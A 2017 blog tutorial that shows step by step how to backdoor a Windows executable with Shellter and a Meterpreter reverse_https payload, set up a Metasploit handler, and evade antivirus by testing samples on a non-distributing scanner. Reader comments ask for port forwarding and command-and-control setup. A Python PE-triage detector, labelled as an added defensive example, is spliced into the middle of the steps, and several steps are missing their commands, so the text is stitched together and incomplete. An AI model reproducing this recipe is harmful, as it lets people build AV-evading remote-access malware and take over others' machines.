Tutorial: Avoid Antiviruses and Compromise Workstations – Part 1

March 23, 2017 | Views: 3682


It’s 2017 and traditional Antivirus solutions are becoming more and more obsolete with every passing day. The rise of exploit kits and “do it yourself malware” means that organizations can no longer rely solely on Antivirus solutions to keep them safe. In fact, someone with little experience can now make a unique piece of malware that is capable of evading the majority, if not all traditional Antivirus solutions.

This guide is aimed at all skill levels, from students to professional penetration testers, and shows how anyone can create a unique piece of malware (capable of evading AV) that gives them remote access to a machine using Metasploit and Shellter.

Disclaimer: This guide is for educational purposes only, and can be used on a Local Area Network (LAN) to demonstrate how easily a workstation can be compromised without an organization being aware. This guide is limited to a LAN and does not detail how to set up port forwarding from public IPs to private IPs, command and control servers, or how to configure firewalls. This is largely unnecessary for isolated demonstrations; however, if enough interest is shown I may add this to another guide. No warranty is provided on the accuracy of this guide and it is provided strictly as is. I will not go into what all of the commands are performing in this particular tutorial, but depending on the community response I will look to explain it more in depth in another post.

Meterpreter and Shellter
Creating the backdoor

  1. Elevate to root and download Shellter – Open a terminal and type:
    sudo su
    apt-get install shellter
  2. Find a 32-bit executable vulnerable to PE injection (the uninstall files found after installing a program work well). Copy this to your Kali Desktop.
  3. Change directory and run Shellter – in the same terminal type:
    cd Desktop
    shellter &
  4. Under Operation mode, select automatic and choose your executable target – type:
    <filename of vulnerable 32-bit executable>
  5. Shellter will attempt to find an entry point for the backdoor; if it throws errors and fails, find a different executable to use.
  6. Under Enable Stealth mode – type:
    Y to attempt to preserve the original .exe functionality (not recommended if you used an uninstall executable)
    N to strip the program's original functionality and just run as a backdoor.
  7. Under Payloads – type:
    L followed by a number to use a native Meterpreter backdoor
    C to use a custom script
  8. Find out your local IP address – Open your existing terminal and type:
  9. Note your local IP address (shown next to 'inet').
  10. Set the destination IP for the payload – Return to Shellter and type:
    <Local IP Address>
    <Local port to run on, e.g. 8080>
  11. You will see Injection: Verified!
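Added defensive example, not code from the original post: a static triage check in plain Python that parses a PE header and flags an entry point lying outside .text or in a writable-and-executable section, the kind of layout anomaly a crudely injected executable shows. The function names and the header-only sample images are constructed for this example. The caveat a defender needs: an injection that reuses the host executable's existing code section can pass this check, so hash-based allowlisting of approved executables remains the stronger control.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section characteristic flags (PE/COFF spec)
IMAGE_SCN_MEM_WRITE = 0x80000000

def parse_pe(data):
    """Return (entry_rva, [(name, vaddr, vsize, characteristics)]) from PE image bytes."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)       # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)  # SizeOfOptionalHeader
    opt = e_lfanew + 24                                        # optional header offset
    entry_rva, = struct.unpack_from("<I", data, opt + 16)      # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((f[0].rstrip(b"\0").decode(), f[2], f[1], f[9]))
    return entry_rva, sections

def triage(data):
    """Flag layout anomalies that a normally compiled executable rarely has."""
    entry, sections = parse_pe(data)
    findings, entry_section = [], None
    for name, vaddr, vsize, chars in sections:
        if vaddr <= entry < vaddr + vsize:
            entry_section = name
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name} is writable and executable")
    if entry_section is None:
        findings.append("entry point lies outside every section")
    elif entry_section != ".text":
        findings.append(f"entry point is in {entry_section}, not .text")
    return findings

def build_pe(sections, entry_rva):
    """Constructed fixture: a header-only PE32 image (no code at all) to exercise triage()."""
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)   # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H14xI", 0x10B, entry_rva).ljust(224, b"\0")  # PE32 magic, entry point
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, 0, 0, 0, 0, 0, 0, ch)
                     for n, va, vs, ch in sections)
    return dos + b"PE\0\0" + coff + opt + table

# Constructed samples: a conventional layout, and one whose entry point sits in a W+X section.
CLEAN = build_pe([(".text", 0x1000, 0x200, IMAGE_SCN_MEM_EXECUTE),
                  (".data", 0x2000, 0x100, IMAGE_SCN_MEM_WRITE)], 0x1010)
ODD = build_pe([(".text", 0x1000, 0x200, IMAGE_SCN_MEM_EXECUTE),
                (".rsrc", 0x2000, 0x100, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE)], 0x2040)
```

Run `triage()` over a real binary by passing `open(path, "rb").read()`; an empty list means no anomaly was found, not that the file is clean.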

Setting up your Kali listener and handler
At this stage, you are halfway there and can copy your created malware to a USB or the like.

Note – This is also your chance to scan it with AV, but be warned: do not use VirusTotal.com, because VirusTotal.com distributes the sample to antivirus vendors and before too long it will be detected. An alternative such as nodistribute.com will let you test it against a large variety of commonly used AV engines without the risk of it being analysed and added to their lists of known signatures.

After you have a coffee or some tea to perk you up, let’s continue with the lesson.

  1. Run the Metasploit framework – Open your existing terminal and type:
  2. Run the Metasploit handler – type:
    use exploit/multi/handler
  3. Set up your handler with the payload you set on your backdoor – e.g. type:
    set payload windows/meterpreter/reverse_https
    set lport <local port to run on, e.g. 8080>
    set lhost <Local IP Address>
  4. Run your listener and handler – type:
  5. This will now create your Meterpreter console. Ensure your victim machine is on the same network as you and within the same broadcast range. Run the infected executable on the victim machine.

At this stage, you should have established a connection to your victim machine and will retain this connection so long as they are running the infected executable. There are many actions that can be performed (and should be performed) upon gaining remote access.

Thank you for taking the time to read through this guide. If you would like to learn more about what occurs when commands are issued, how to remain persistent after gaining access, or what further actions can be taken upon gaining access, feel free to let me know so that I can make another posting. If you've found this informative and wish to tip Cybytes, please feel free, but it is not a requirement.

Until next time…

  1. Really enjoyed this. Well written and to the point. Would love to hear more details about how to set up port forwarding from public IPs to private IPs, command and control servers, and how to configure firewalls.


    • Hi there,

      I’m glad that you enjoyed this lesson.
      I can definitely look at doing a write-up on port forwarding and configuring firewalls to make the malware executable over the internet. It may not be for a little bit, but if the interest continues then I’ll look into doing another tutorial.

      No problem at all.
